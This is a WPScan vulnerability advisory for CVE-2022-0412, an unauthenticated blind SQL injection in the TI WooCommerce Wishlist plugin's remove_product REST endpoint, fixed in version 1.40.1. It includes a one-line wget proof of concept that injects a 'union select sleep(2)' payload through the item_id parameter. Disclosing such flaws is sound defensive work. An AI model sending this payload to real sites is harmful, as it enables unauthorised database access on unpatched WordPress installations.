WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection

Description

The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks

Proof of Concept

time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g'

Even though it will produce an error 400, the payload is processed and response delayed

Affects Plugins

ti-woocommerce-wishlist
Fixed in version 1.40.1
ti-woocommerce-wishlist-premium
Fixed in version 1.40.1

References

CVE
CVE-2022-0412
URL
https://plugins.trac.wordpress.org/changeset/2668899

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
e984ba11-abeb-4ed4-9dad-0bfd539a9682

Timeline

Publicly Published

2022-01-31 (about 8 months ago)

Added

2022-01-31 (about 8 months ago)

Last Updated

2022-04-12 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin